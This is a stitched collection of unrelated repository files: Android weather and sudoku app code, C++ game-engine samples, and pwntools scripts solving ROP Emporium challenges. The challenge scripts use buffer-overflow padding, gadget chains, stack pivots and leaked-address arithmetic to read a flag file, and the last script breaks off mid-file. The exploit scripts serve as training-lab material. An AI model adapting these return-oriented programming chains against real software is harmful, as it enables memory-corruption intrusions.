            504 -> "Gateway Timeout" to "504"
            else -> "Something went wrong" to "00"
        }
        val toJson = Gson().toJson(checkServerResponse(ErrorResponse("", message, code, null), response))
        val body = ResponseBody.create(contentType, toJson)
        return response.newBuilder().body(body).build()
}
private fun checkServerResponse(defaultResponse: ErrorResponse, response: Response): ErrorResponse {
var status = defaultResponse;
val errorBodyValue = response.body?.string()
try {
val errorObject = JSONObject(errorBodyValue)
errorObject.let {
if (it.has("status")) {
if (it.get("status") is Int) {
status = ErrorResponse("", errorObject.getString("error"), response.code.toString(), "")
} else if (it.get("status") is JSONObject) {
status = ErrorResponse("", errorObject.getJSONObject("status").getString("messageDescription"), errorObject.getJSONObject("status").getString("errorCode"),"")
}
} else if (it.has("error_description") && it.getString("error_description") != null) {
status = ErrorResponse("", it.getString("error_description"), response.code.toString(), "")
} else if (it.has("defaultUserMessage") && it.getString("defaultUserMessage") != null) {
status = ErrorResponse("", it.getString("defaultUserMessage"), response.code.toString(), "")
}
}
} catch (e: JSONException) {
return defaultResponse
}
return status
}
}<file_sep>/app/src/main/java/com/geeta/weatherapp/ui/base/BaseActivity.kt
package com.cafecraft.aps.ui.base
import android.annotation.SuppressLint
import android.app.AlertDialog
import android.app.Dialog
import android.app.Fragment
import android.content.Context
import android.content.Intent
import android.content.Intent.FLAG_ACTIVITY_NO_ANIMATION
import android.os.Bundle
import android.view.View
import android.view.inputmethod.InputMethodManager
import com.geeta.weatherapp.R
import com.geeta.weatherapp.utils.ProgressDialogHelper
import dagger.android.support.DaggerAppCompatActivity
import io.reactivex.disposables.CompositeDisposable
import javax.inject.Inject
/**
* Created by Geetanjali on 02/08/17.
*/
abstract class BaseActivity : DaggerAppCompatActivity() {
protected var progressDialog: Dialog? = null
private var mDisposables: CompositeDisposable? = null
// abstract fun busInputReceived(busModal: Any?)
/* @Inject
lateinit var rxBus: RxBus*/
lateinit var progressDialogHelper: ProgressDialogHelper
override fun onCreate(savedInstanceState: Bundle?) {
super.onCreate(savedInstanceState)
// initRxBus()
progressDialogHelper = ProgressDialogHelper(this)
}
/* private fun initRxBus() {
mDisposables = CompositeDisposable()
val fragemerConnectEmitter = rxBus.asFlowable().publish()
mDisposables?.add(fragemerConnectEmitter.subscribe({ o ->
busInputReceived(o)
}))
mDisposables?.add(fragemerConnectEmitter.connect())
}
*/
fun moveNextTo(nextActivity: Class<*>) {
val intent = Intent(this, nextActivity)
intent.flags=FLAG_ACTIVITY_NO_ANIMATION
startActivity(intent)
}
fun moveNextToFinishingIt(nextActivity: Class<*>) {
moveNextTo(nextActivity)
finish()
}
override fun onDestroy() {
super.onDestroy()
mDisposables?.clear()
}
fun showAlert(message: String) {
val builder = AlertDialog.Builder(this@BaseActivity, R.style.AppTheme)
builder.setMessage(message).setTitle(R.string.app_name).setCancelable(true).setIcon(R.drawable.ic_launcher_background)
builder.create().show()
}
fun showAlertWithOkButton(message: String) {
val builder = AlertDialog.Builder(this@BaseActivity, R.style.AppTheme)
builder.setMessage(message).setTitle(R.string.app_name).setCancelable(true)
builder.setNeutralButton("Ok") { dialog, which -> dialog.dismiss() }
builder.create().show()
}
    fun showHideProgressDialog(show: Boolean) {
        // progressDialogHelper is a non-null lateinit property; the safe calls were redundant.
        if (show) {
            progressDialogHelper.show()
        } else {
            progressDialogHelper.dismiss()
        }
    }
}
<file_sep>/app/src/main/java/com/geeta/weatherapp/worker/WeatherWorkerFactory.kt
package com.geeta.weatherapp.worker
import android.content.Context
import androidx.work.Configuration
import androidx.work.Worker
import androidx.work.WorkerParameters
import javax.inject.Inject
interface WeatherWorkerFactory {
fun create(appContext: Context, params: WorkerParameters): Worker
}
<repo_name>Paolo-Oliverio/KissBasicSample
<file_sep>#include <entt/entt.hpp>
#include "pch.h"
#include <Kiss/systems/spriteMove.h>
#include <Kiss/systems/SpriteSheet.h>
#include "assets/data.h"
using namespace kiss;
ecs::flipbookData Anims[] = {
{ 1.f, id::spr::RectAnim1, 3}
};
namespace ecstest
{
entt::registry world;
void init(f32 w, f32 h, int numEntities)
{
using namespace ecs;
auto group = world.group<pos2d, vel2d>();
//auto spr = sprite{ id::spr::RectAnim1, 2 ,0 };
auto bounds = aabb(14, 32, w - 10, h);
flipbook::properties options{ 1,0,0,4,0 };
for (auto i = 0; i < numEntities; ++i)
{
auto entity = world.create();
auto pos = pos2d::rand(bounds);
auto vel = vel2d::rand(-90, 90, (float)kinc_random_get_in(150, 500));
auto s = vel.len() * 0.01f;
world.emplace<pos2d>(entity, pos);
world.emplace<vel2d>(entity, vel);
flipbook::play(world, entity, &Anims[0], options, kinc_random_get_in(0, 20) * 0.1f, s);
}
}
void update(f32 w, f32 h, float dt)
{
const aabb bounds(14, 32, w - 10, h);
ecs::move::step_in_aabb(world, dt, bounds);
ecs::system::UpdateFlipbooks(world, dt);
}
void render()
{
using namespace ecs;
auto view = world.group<pos2d, vel2d>(entt::get<flipbook>);
const iColor cMultiplier = 0x80203040;
const iColor colors[] = { 0xFF00A5FF, 0xFF800080, 0xFFCBC0FF };
const iColor dark[] = { mul(colors[0], cMultiplier), mul(colors[1], cMultiplier), mul(colors[2], cMultiplier) };
auto& b = gfx2d::batcher;
for (auto entity : view)
{
const auto& [position, animation] = view.get<pos2d, flipbook>(entity);
b.vertexdata(colors[animation.frameOffset], colors[animation.frameOffset], dark[animation.frameOffset], dark[animation.frameOffset]);
b.sprite(animation.getFrame(), position.x, position.y);
}
}
}<file_sep>#pragma once
#include "pch.h"
namespace kiss {
namespace id {
namespace spr {
constexpr u16 RectAnim1 = 0;
constexpr u16 RectAnim2 = 1;
constexpr u16 RectAnim3 = 2;
constexpr u16 RectRect = 3;
}
namespace s9 {
constexpr u16 Test = 0;
}
namespace fnt {
constexpr u8 Text = 0;
constexpr u8 Textbig = 1;
}
}
}<file_sep>#include <Kiss/pch.h>
#include <Kiss/render/basicPipeline.h>
#include <Kiss/render/quadbatcher.h>
#include <Kiss/time/delta.h>
#include <Kiss/gfx/color.h>
#include <Kiss/math/math.h><file_sep>#include <pch.h>
#include <Kiss/app.h>
#include <kinc/graphics4/graphics.h>
#include <kinc/display.h>
#include <kinc/math/random.h>
#include <kinc/input/keyboard.h>
#include <kinc/input/surface.h>
#include <kinc/input/mouse.h>
#include <string>//for string appending.
#include <assets/data.h>
#include "tests/gfxcommandstest.h"
#ifdef KISS_BOX2D
#include "tests/box2dtest.h"
#endif
#ifdef KISS_ENTT
#include "tests/ecstest.h"
#endif
#ifdef KISS_SOLOUD
#include "tests/soloudtest.h"
#endif
#ifdef KISS_IMGUI
#include "tests/imguitest.h"
#endif
using namespace kiss;
namespace win
{
u32 w = 1280;
u32 h = 720;
f32 sw = (f32)w;
f32 sh = (f32)h;
}
int app::start(int argc, char** argv)
{
kinc_random_init(0);
using namespace win;
framework::init("Hello World");
/*
#ifndef KORE_HTML5
auto d = kinc_display_current_mode(0);
w = d.width;
h = d.height;
#endif
*/
framework::setResolution(w, h);
gfxCmdBuffer::setup(sw, sh);
WithEntt(ecstest::init(sw, sh, 4000));
WithBox2D(box2dtest::init());
return 0;
}
void app::release() {
}
void app::resize(int x, int y)
{
using namespace win;
w = x; sw = (x / gfx2d::scaling);
h = y; sh = (y / gfx2d::scaling);
gfxCmdBuffer::setup(sw,sh);
}
void app::input(float dt) {
}
void app::prePhysics(float dt)
{
WithEntt(ecstest::update(win::sw,win::sh,dt));
WithBox2D(box2dtest::update(dt));
}
void app::postPhysics(float dt)
{
WithSoloud(soundtest::update(dt));
}
#ifdef KISS_IMGUI
void app::gui(float dt)
{
WithImgui(imguitest::exec(dt));
}
#endif
void app::render(float dt)
{
//kinc_g4_viewport(0, 0, win::w, win::h);
kinc_g4_scissor(0, 0, win::w, win::h);
//kinc_g4_viewport(0, 0, 1280, 720);
//kinc_g4_scissor(0, 0, 1280,720);
kinc_g4_clear(KINC_G4_CLEAR_COLOR, 0xFF808080, 0, 0);
//kinc_g4_clear(KINC_G4_CLEAR_COLOR, iColor((u8)kinc_random_get_in(40, 255), (u8)kinc_random_get_in(40, 255), (u8)kinc_random_get_in(40, 255)), 0, 0);
//----------------------------------------------------------------
auto& b = gfx2d::batcher;
b.begin(&gfx2d::base::pipeline, gfx2d::atlas0);
WithEntt(ecstest::render());
//----------------------------------------------------------------
gfxCmdBuffer::render();
//----------------------------------------------------------------
b.vertexdata(iColor::White, iColor::White, iColor::White, 0xFF404040);
b.scale9(id::s9::Test, aabb(10, 10, 210, 210));
b.vertexdata(iColor::White, iColor::White, 0xFFA0A0A0, 0xFFA0A0A0);
std::string str("fps : ");
str.append(std::to_string((int)(1.f / dt)));
auto tc = textCtx(10, 10);
b.text(tc, str.c_str());
//----------------------------------------------------------------
WithBox2D(box2dtest::render());
//----------------------------------------------------------------
b.end();
}<file_sep>#include "pch.h"
#include <Kiss/render/commands.h>
#include "assets/data.h"
using namespace kiss;
namespace gfxCmdBuffer
{
constexpr int buffersize = 512;
u8 bufferData[buffersize];
gfx2d::commandBuffer<u32> commandbuffer(bufferData, buffersize);
void setup(float x, float y) {
commandbuffer.reset();
using namespace gfx2d;
using namespace id;
constexpr sprId spr = spr::RectRect;
constexpr sprId s9 = s9::Test;
constexpr u8 font = fnt::Text;
u32 col[4] = { 0xFF505050, 0x80FFFFFF, 0xFF505050, 0x80FFFFFF };
commandbuffer
.vertexdata(col)
.sprite(spr, 16, 32)
.sprite(spr, 16, y)
.sprite(spr, x - 10, y)
.sprite(spr, x - 10, 32)
.scale9(s9, 250, 250, 294, 300)
.scale9(s9, 306, 250, 500, 300)
.textblock(100, 100).text("Ciao ")
.vertexdata(iColor::Red).font(font).text("Mondo!!!");
}
void render() {
commandbuffer.execute();
}
}<file_sep>#ifdef KISS_BOX2D
#include "pch.h"
#include <box2d/box2d.h>
#include <assets/data.h>
#include <kinc/math/random.h>
using namespace kiss;
constexpr float physcale = 100.f;
namespace {
b2World world = b2World({ 0.f, 9.81f });
float elapsed = 0;
b2Body* groundBody;
b2Body* body;
b2Body* body2;
}
namespace box2dtest {
void init() {
b2BodyDef groundBodyDef;
groundBodyDef.position.Set(6.40f, 5.f);
groundBodyDef.angle = deg2rad(20);
groundBody = world.CreateBody(&groundBodyDef);
b2PolygonShape groundBox;
groundBox.SetAsBox(10.0f * physcale, 0.05f);
groundBody->CreateFixture(&groundBox, 0.0f);
b2PolygonShape dynamicBox;
b2Vec2 vertices[4];
vertices[0].Set(-0.16f, 0.f);
vertices[1].Set(0.1f, 0.f);
vertices[2].Set(0.1f, -0.32f);
vertices[3].Set(-0.16f, -0.32f);
dynamicBox.Set(vertices, 4);
b2FixtureDef fixtureDef;
fixtureDef.shape = &dynamicBox;
fixtureDef.density = 1.0f;
fixtureDef.friction = 0.75f;
fixtureDef.restitution = 0.75f;
b2BodyDef bodyDef;
bodyDef.type = b2_dynamicBody;
bodyDef.position.Set(1.0f , 1.0f);
body = world.CreateBody(&bodyDef);
body->CreateFixture(&fixtureDef);
bodyDef.position.Set(0.9f , 1.3f);
body2 = world.CreateBody(&bodyDef);
body2->CreateFixture(&fixtureDef);
}
void update(float dt)
{
elapsed += dt;
if (elapsed > 10) {
body->SetTransform(b2Vec2(1.f + (float)kinc_random_get_in(-10, 10) / physcale, 1.0f), 0);
body->SetAngularVelocity(0);
body->SetLinearVelocity(b2Vec2(0, 0));
body2->SetTransform(b2Vec2(1.f + (float)kinc_random_get_in(-20, 20) / physcale, 1.32f), 0);
body2->SetAngularVelocity(0);
body2->SetLinearVelocity(b2Vec2(0, 0));
elapsed = 0;
}
world.Step(dt, 6, 2);
}
void render()
{
auto & b = gfx2d::batcher;
u32 color[4] = { iColor::White, iColor::Red, iColor::Green, iColor::Blue };
b.vertexdata(color);
b.sprite(id::spr::RectAnim1, 100, 100, rot(deg2rad(elapsed * 360)));
auto xform = body->GetTransform();
b.sprite(id::spr::RectAnim1, xform.p.x * physcale, xform.p.y * physcale, rot(xform.q.c, xform.q.s));
xform = body2->GetTransform();
b.sprite(id::spr::RectAnim1, xform.p.x * physcale, xform.p.y * physcale, rot(xform.q.c, xform.q.s));
}
}
#endif<file_sep>#pragma once
#include "pch.h"
#include "Kiss/sound/sound.h"
#include "soloud.h"
#include "soloud_sfxr.h"
#include <kinc/math/random.h>
using namespace kiss;
using namespace SoLoud;
namespace soundtest {
auto elapsed = 0.f;
Sfxr sfx;
handle h;
void play() {
auto& s = sound::manager;
sfx.loadPreset(3, kinc_random_get());
h = s.play(sfx);
s.setRelativePlaySpeed(h, kinc_random_get_in(75, 150) / 100.f);
}
void update(float dt) {
elapsed += dt;
if (elapsed > 1.5f) {
play();
elapsed = 0.f;
}
}
}<file_sep>#include "pch.h"
#include <Kiss/app.h>
#include <imgui.h>
using namespace kiss;
namespace imguitest
{
bool demo_window_open = true;
void exec(float dt)
{
ImGui::ShowDemoWindow(&demo_window_open);
}
}<file_sep># KissBasicSample
Sample to show off some Kiss engine features.
|
<repo_name>GGStudio/Clear-Sudoku<file_sep>/app/src/main/java/com/ggstudio/clearsudoku/engine/Group.java
package com.ggstudio.clearsudoku.engine;
import com.ggstudio.clearsudoku.engine.Enums.*;
public class Group {
public Cell[] cells;
public GroupType type;
public Group(GroupType groupType, Cell c0, Cell c1, Cell c2,
Cell c3, Cell c4, Cell c5,
Cell c6, Cell c7, Cell c8)
{
cells = new Cell[9];
cells[0]=c0;
cells[1]=c1;
cells[2]=c2;
cells[3]=c3;
cells[4]=c4;
cells[5]=c5;
cells[6]=c6;
cells[7]=c7;
cells[8]=c8;
type=groupType;
setTypeToCells();
}
private void setTypeToCells(){
if(type==GroupType.BLOCK){
for(int i=0;i<9;i++)
cells[i].setBlock(this);
}
else if(type==GroupType.ROW){
for(int i=0;i<9;i++)
cells[i].setRow(this);
}
else if(type==GroupType.COLUMN){
for(int i=0;i<9;i++)
cells[i].setColumn(this);
}
}
public int getSum(){
int sum=0;
for(int i=0;i<cells.length;i++){
sum+=cells[i].getValue();
}
return sum;
}
    public boolean isAllUnique(){
        int[] availableDigitsInGroup = new int[9];
        for(int i=0;i<cells.length;i++){
            int value = cells[i].getValue();
            if (value < 1 || value > 9)
                return false; // blank/undefined cell: the group cannot be all unique
            availableDigitsInGroup[value - 1] += 1; // values are 1..9, indexes 0..8
        }
        for(int i=0; i<availableDigitsInGroup.length; i++){
            if (availableDigitsInGroup[i] != 1)
                return false;
        }
        return true;
    }
}
<file_sep>/app/src/main/java/com/ggstudio/clearsudoku/engine/Move.java
package com.ggstudio.clearsudoku.engine;
/**
* Created by Андрей on 07.01.2015.
*/
import com.ggstudio.clearsudoku.engine.Enums.*;
public class Move {
public Move(int x,int y, int value,MoveType type) {
_x=x;
_y=y;
_value=value;
_type=type;
}
private int _x,_y;
private int _value;
private MoveType _type;
}
<file_sep>/app/src/main/java/com/ggstudio/clearsudoku/engine/Enums.java
package com.ggstudio.clearsudoku.engine;
/**
* Created by Андрей on 07.01.2015.
*/
public class Enums {
public enum MoveType{
INCLUDE,EXCLUDE
}
public enum GroupType{
BLOCK, ROW, COLUMN
}
public enum Complexity {
EASY, NORMAL, HARD
}
public enum CellState {
BLANK, DEFINED, START
}
}
<file_sep>/app/src/main/java/com/ggstudio/clearsudoku/NewGameFragment.java
package com.ggstudio.clearsudoku;
import android.app.FragmentManager;
import android.app.FragmentTransaction;
import android.content.Intent;
import android.os.Bundle;
import android.app.Fragment;
import android.view.LayoutInflater;
import android.view.View;
import android.view.ViewGroup;
import android.widget.Button;
public class NewGameFragment extends Fragment {
private Button buttonEasy;
private Button buttonModerate;
private Button buttonHard;
public NewGameFragment() {
// Required empty public constructor
}
@Override
public View onCreateView(LayoutInflater inflater, ViewGroup container,
Bundle savedInstanceState) {
final View newGameFragment = inflater.inflate(R.layout.fragment_new_game, container, false);
final Intent intent = new Intent(NewGameFragment.this.getActivity(), GameActivity.class);
buttonEasy = (Button) newGameFragment.findViewById(R.id.buttonEasy);
buttonModerate = (Button) newGameFragment.findViewById(R.id.buttonModerate);
buttonHard = (Button) newGameFragment.findViewById(R.id.buttonHard);
buttonEasy.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View view) {
intent.putExtra("difficulty", "easy");
startActivity(intent);
}
});
buttonModerate.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View view) {
intent.putExtra("difficulty", "moderate");
startActivity(intent);
}
});
buttonHard.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View view) {
intent.putExtra("difficulty", "hard");
startActivity(intent);
}
});
//return inflater.inflate(R.layout.fragment_new_game, container, false);
return newGameFragment;
}
}
<file_sep>/app/src/main/java/com/ggstudio/clearsudoku/engine/Sudoku.java
package com.ggstudio.clearsudoku.engine;
/**
* Created by Андрей on 07.01.2015.
*/
import java.util.ArrayList;
import com.ggstudio.clearsudoku.engine.Enums.*;
public class Sudoku {
SudokuField field;
ArrayList<Move> moves;
Complexity complexity;
int turn = 0;
public Sudoku() {
moves = new ArrayList<Move>();
field= new SudokuField();
complexity=Complexity.NORMAL;
}
}
<file_sep>/app/src/main/java/com/ggstudio/clearsudoku/GameViewAdapter.java
package com.ggstudio.clearsudoku;
/**
* Created by andrey on 06.01.15.
*/
import android.app.Activity;
import android.view.Gravity;
import android.view.View;
import android.view.ViewGroup;
import android.widget.BaseAdapter;
import android.widget.GridView;
import android.widget.TextView;
import java.util.List;
/** Adapter class for GridView element (GameField).*/
public class GameViewAdapter extends BaseAdapter {
Activity ac;
List<Integer> nums;
int oneWidth;
GameViewAdapter(Activity ac, List<Integer> nums, int oneWidth) {
this.ac = ac;
this.nums = nums;
this.oneWidth = oneWidth;
}
@Override
public int getCount() {
return nums.size();
}
@Override
public Object getItem(int location) {
return nums.get(location);
}
@Override
public long getItemId(int arg0) {
return 0;
}
@Override
public View getView(int location, View v, ViewGroup parent) {
//int number = nums.get(location);
TextView tv = new TextView(ac);
GridView.LayoutParams par = new GridView.LayoutParams(oneWidth , oneWidth );
tv.setLayoutParams(par);
tv.setGravity(Gravity.CENTER);
tv.setTextSize(18);
        // The ids skip one value at each row of 9 cells, so the whole
        // switch collapses to: id = n + 11 + n / 9
        int n = nums.get(location);
        int id = n + 11 + n / 9;
        tv.setId(id);
        tv.setTag(Integer.toString(id));
//tv.setText(tv.getTag().toString());
return tv;
}
}<file_sep>/app/src/main/java/com/ggstudio/clearsudoku/engine/Cell.java
package com.ggstudio.clearsudoku.engine;
import com.ggstudio.clearsudoku.engine.Enums.*;
public class Cell {
public Cell(int x,int y) {
this(x,y,-1);
}
public Cell(int x, int y, int val){
this.setX(x);
this.setY(y);
digits = new boolean[9];
for(int i=0;i<9;i++)
digits[i]=false;
if (val>0 && val<10)
{
_state = CellState.DEFINED;
}
else
{
_state = CellState.BLANK;
}
_value = val;
_count = 0;
}
public void setState(CellState _state) {
this._state = _state;
}
public CellState getState() {
return _state;
}
private void setX(int x) {
this._x = x;
}
private void setY(int y) {
this._y = y;
}
public int getX() {
return _x;
}
public int getY() {
return _y;
}
/* public void exclude(int excludeValue){
if (_state==CellState.BLANK){
if(excludeValue>0 && excludeValue<10){
if (digits[excludeValue-1]){
digits[excludeValue-1]=false;
_count--;
if (_count==1) {
_state=CellState.DEFINED;
}
}
}
}
}
*/
public void trigger(int digit){
if(digit<0 || digit>=9) return;
if (_state==CellState.START)return;
digits[digit]=!digits[digit];
if (digits[digit])
_count++;
else
_count--;
if (_count==1){
_value=findSingleValue();
_state=CellState.DEFINED;
} else {
_value=-1;
_state=CellState.BLANK;
}
}
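    /* Illustrative walkthrough (added): on a blank cell, trigger(4) marks
       candidate index 4; being the only candidate, the cell is promoted to
       DEFINED with _value = 4 (the zero-based index found by
       findSingleValue). Calling trigger(4) again clears the candidate and
       the cell falls back to BLANK. */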
private int findSingleValue(){
int i;
int s=0;
int count=0;
for(i=0;i<9;i++){
if (digits[i]){
count++;
s=i;
}
}
if(count==1) return s;
return -1;
}
    public boolean hasDigit(int i){
        if(i>0 && i<10){
            return digits[i-1]; // digits is zero-based; the original digits[i] overflowed for i == 9
        } else
            return false;
    }
public boolean[] getDigits() {
return digits;
}
public void setRow(Group row) {
this.row = row;
}
public void setBlock(Group block) {
this.block = block;
}
public void setColumn(Group column) {
this.column = column;
}
public void setValue(int value) {
this._value = value;
_state=CellState.START;
}
public boolean isDefined(){
return (_state==CellState.DEFINED);
}
public int getValue() {
return _value;
}
private CellState _state;
public Group row,block,column;
private boolean[] digits;
private int _value;
private int _count;
private int _x,_y;
}
<repo_name>oopsmishap/rop-emporium
<file_sep>#!/bin/python3
from pwn import *
context.clear(arch='i386')
filename = './write432'
elf = ELF(filename)
io = process(filename)
# gadgets
r = ROP(elf)
pop = p32(r.edi.address)
mov = p32(0x8048543)
bss = elf.bss()
# main
r.raw(cyclic(44))
# 1st write
r.raw(pop)
r.raw(p32(bss))
r.raw(b'flag')
r.raw(mov)
# 2nd write
r.raw(pop)
r.raw(p32(bss+4))
r.raw(b'.txt')
r.raw(mov)
# call print_file
r.call('print_file', [bss])
payload = r.chain()
io.recvuntil('>')
io.sendline(payload)
io.recvuntil('!\n')
flag = io.recvline().decode().rstrip()
log.success("Flag: {}".format(flag))<file_sep>#!/bin/python3
from pwn import *
context.clear(arch='i386')
filename = './badchars32'
elf = ELF(filename)
io = process(filename)
# gadgets
xor = p32(0x8048547) # xor byte ptr [ebp], bl; ret;
mov = p32(0x804854f) # mov dword ptr [edi], esi; ret;
pop_ebp = p32(0x80485bb) # pop ebp; ret;
pop_ebx = p32(0x804839d) # pop ebx; ret;
pop_esi = p32(0x80485b9) # pop esi; pop edi; pop ebp; ret;
bss = elf.bss()
# helper functions
def write_string(string, index):
rop = ROP(elf)
rop.raw(pop_esi)
rop.raw(string)
rop.raw(p32(bss+(index*4)))
rop.raw(b'AAAA') # filler
rop.raw(mov)
return rop.chain()
def xor_index(index):
rop = ROP(elf)
rop.raw(pop_ebp)
rop.raw(bss+index)
rop.raw(pop_ebx)
rop.raw(0x2)
rop.raw(xor)
return rop.chain()
# bad chars 'x' 'g' 'a' '.'
# 7867612e
# xor'd string 'flce,tzt'
# 0x02 key at indexes [2,3,4,6]
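# Illustrative sketch (added, not part of the original exploit): deriving the
# encoded string above, assuming key 0x02 is applied only to the badchar bytes.
enc = bytes(c ^ 0x2 if c in b'xga.' else c for c in b'flag.txt')
assert enc == b'flce,tzt'  # encoded bytes land at indexes 2, 3, 4, 6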
payload = b""
payload += cyclic(44)
payload += write_string(b'flce', 0)
payload += write_string(b',tzt', 1)
payload += xor_index(2)
payload += xor_index(3)
payload += xor_index(4)
payload += xor_index(6)
# call print_file
r = ROP(elf)
r.call('print_file', [bss])
payload += r.chain()
io.recvuntil('>')
io.sendline(payload)
io.recvuntil('!\n')
flag = io.recvline().decode().rstrip()
log.success("Flag: {}".format(flag))<file_sep>#!/bin/python3
from pwn import *
context.clear(arch='amd64')
filename = './write4'
elf = ELF(filename)
io = process(filename)
# gadgets
r = ROP(elf)
pop = p64(r.r14.address) # pop r14; pop r15; ret;
mov = p64(0x400628) # mov qword [r14], r15
bss = elf.bss()
# main
r.raw(cyclic(40))
# write
r.raw(pop)
r.raw(p64(bss))
r.raw(b'flag.txt')
r.raw(mov)
# call print_file
r.call('print_file', [bss])
payload = r.chain()
io.recvuntil('>')
io.sendline(payload)
io.recvuntil('!\n')
flag = io.recvline().decode().rstrip()
log.success("Flag: {}".format(flag))<file_sep>#!/bin/python3
from pwn import *
context.clear(arch='amd64')
filename = './split'
elf = ELF(filename)
io = process(filename)
r = ROP(elf)
r.raw(cyclic(40))
r.call(elf.plt['system'], [0x601060])
r.call('main')
payload = r.chain()
io.recvuntil('>')
io.sendline(payload)
io.recvuntil('!\n')
flag = io.recvline().decode().rstrip()
log.success("Flag: {}".format(flag))
<file_sep>#!/bin/python3
from pwn import *
context.clear(arch='amd64')
filename = './ret2csu'
elf = ELF(filename)
io = process(filename)
# variables
dead = p64(0xdeadbeefdeadbeef)
cafe = p64(0xcafebabecafebabe)
dood = p64(0xd00df00dd00df00d)
# gadgets
r1 = ROP(elf)
csu_mov = p64(0x400680)
csu_pop = p64(0x40069a) # pop rbx, rbp, r12, r13, r14, r15; ret;
csu_r12 = p64(0x600e30) # r12(.dyn) + rbx(0x3) * 8
csu_rbx = p64(0x3) # 0x3 * 8 = offset from .dyn to fini@dyn
csu_rbp = p64(0x4) # needed for: add rbx, 0x1; cmp rbp, rbx; jne csu_mov;
csu_fil = p64(0x0)
pop_rdi = p64(r1.rdi.address) # pop rdi; ret;
r2w_plt = p64(elf.plt.ret2win)
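# Illustrative note (added): __libc_csu_init supplies two gadget halves.
# csu_pop loads rbx, rbp, r12-r15 from the stack; csu_mov then performs
# mov rdx, r15; mov rsi, r14; mov edi, r13d; call qword [r12 + rbx*8].
# With rbx = 3 and r12 pointing at .dynamic, r12 + rbx*8 lands on the
# fini pointer noted above, a harmless target that survives the call.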
r1.raw(cyclic(40))
r1.raw(csu_pop)
r1.raw(csu_rbx)
r1.raw(csu_rbp)
r1.raw(csu_r12)
r1.raw(dead) # arg1
r1.raw(cafe) # arg2
r1.raw(dood) # arg3
r1.raw(csu_mov)
payload = b""
payload += r1.chain()
# runs through csu pop chain again, fill with 0s
payload += csu_fil * 7
r2 = ROP(elf)
r2.raw(pop_rdi) # csu only moves over dword [mov edi, r13d]
r2.raw(dead)
r2.raw(r2w_plt)
payload += r2.chain()
io.recvuntil('> ')
io.sendline(payload)
io.recvuntil('!\n')
flag = io.recvline().decode().rstrip()
log.success("Flag: {}".format(flag))<file_sep>#!/bin/python3
from pwn import *
context.clear(arch='amd64')
filename = './pivot'
libname = './libpivot.so'
elf = ELF(filename)
lib = ELF(libname)
io = process(filename)
# gadgets
r = ROP(elf)
call_rax = p64(0x4006b0) # call rax;
xchg = p64(0x4009bd) # xchg rax, rsp; ret;
mov_rax_rax = p64(0x4009c0) # mov rax, qword ptr [rax]; ret;
add_rax_rbp = p64(0x4009c4) # add rax, rbp; ret;
pop_rax = p64(r.rax.address) # pop rax; ret;
pop_rbp = p64(r.rbp.address) # pop rbp; ret;
fthold_plt = p64(elf.plt.foothold_function)
fthold_got = p64(elf.got.foothold_function)
ret2win_off = p64(lib.sym.ret2win - lib.sym.foothold_function)
# get leaked address
io.recvuntil("pivot: ")
leak = int(io.recvline().strip()[0:14], 16)
log.info('Leaked: ' + hex(leak))
leak = p64(leak)
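# Illustrative note (added): the binary prints the address of a second
# buffer ("pivot"). The main rop chain is staged there first; the stack
# smash then ends in xchg rax, rsp with rax = leak, pivoting the stack
# pointer onto the staged chain.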
# stack smash
# putting leaked address into rsp
smash = ROP(elf)
smash.raw(cyclic(40))
smash.raw(pop_rax)
smash.raw(leak)
smash.raw(xchg) # put leaked address into rsp
# set up flthold@got.plt
rop = ROP(elf)
rop.raw(fthold_plt) # gen .got.plt
rop.raw(pop_rax)
rop.raw(fthold_got) # gen .got.plt
# call ret2win using fthold address + offset
rop.raw(mov_rax_rax) # mov f<EMAIL> address into rax
rop.raw(pop_rbp)
rop.raw(ret2win_off) # ret2win - fthold
rop.raw(add_rax_rbp) # add offset to rax(<EMAIL>)
rop.raw(call_rax) # call rax(now pointing to <EMAIL>)
io.recvuntil('> ')
io.sendline(rop.chain())
io.recvuntil('> ')
io.sendline(smash.chain())
io.recvuntil('vot\n')
flag = io.recvline().decode().rstrip()
log.success("Flag: {}".format(flag))<file_sep>#!/bin/python3
from pwn import *
context.clear(arch='i386')
filename = './fluff32'
elf = ELF(filename)
io = process(filename)
# variables
pext_str = [0xB4B,0x2DD,0x1D46,0xB5A,0xDB,0xACD,0x1AC5,0xACD]
# gadgets
'''
xchg swaps memory with register:
temp = dest;
dest = src;
src = temp;
bswap will swap endianess
pext
mov eax, ebp;
mov ebx, 0xb0bababa;
pext edx, ebx, eax;
mov eax, 0xdeadbeef;
ret;
edx = pext(ebx[src], eax[mask])
see masks.txt
f = 0xB4B
l = 0x2DD
a = 0x1D46
g = 0xB5A
. = 0xDB
t = 0xACD
x = 0x1AC5
t = 0xACD
'''
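# Illustrative check (added, not part of the original exploit): a pure-Python
# pext confirming each mask above extracts one byte of 'flag.txt' from the
# fixed source value 0xb0bababa used by the gadget.
def _pext(src, mask):
    res, k = 0, 0
    while mask:
        low = mask & -mask        # lowest set bit of the mask
        if src & low:
            res |= 1 << k         # pack the selected source bit
        k += 1
        mask &= mask - 1          # clear that mask bit
    return res
assert bytes(_pext(0xb0bababa, m) for m in pext_str) == b'flag.txt'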
xchg = p32(0x8048555) # xchg byte ptr [ecx], dl; ret;
pext = p32(0x8048543) # see comment block above
pop_ecx_bswap = p32(0x8048558) # pop ecx; bswap ecx; ret;
pop_ebp = p32(0x80485bb) # pop ebp; ret;
bss = elf.bss()
# helper functions
p = make_packer(32, endian='big', sign='unsigned')
def write_string(string, index):
rop = ROP(elf)
rop.raw(pop_ebp)
rop.raw(pext_str[index]) # mask
rop.raw(pext)
rop.raw(pop_ecx_bswap)
rop.raw(p(bss+index)) # big endian
rop.raw(xchg) # swap reg/mem*
return rop.chain()
# main
input_string = b'flag.txt'  # was undefined in the original; one pext mask per character
payload = b""
payload += cyclic(44)
for i in range(0,8):
    payload += write_string(input_string, i)
r = ROP(elf)
r.call('print_file', [bss])
payload += r.chain()
io.recvuntil('>')
io.sendline(payload)
io.recvuntil('!\n')
flag = io.recvline().decode().rstrip()
log.success("Flag: {}".format(flag))<file_sep># ROP Emporium 2020
Solutions/writeup to the new [ROP Emporium](https://ropemporium.com/index.html) 32bit and 64bit bins that were updated July 2020.
<file_sep>#!/bin/python3
from pwn import *
context.clear(arch='amd64')
filename = './callme'
elf = ELF(filename)
io = process(filename)
# variables
dead = 0xdeadbeefdeadbeef
cafe = 0xcafebabecafebabe
dood = 0xd00df00dd00df00d
r = ROP(elf)
r.raw(cyclic(40))
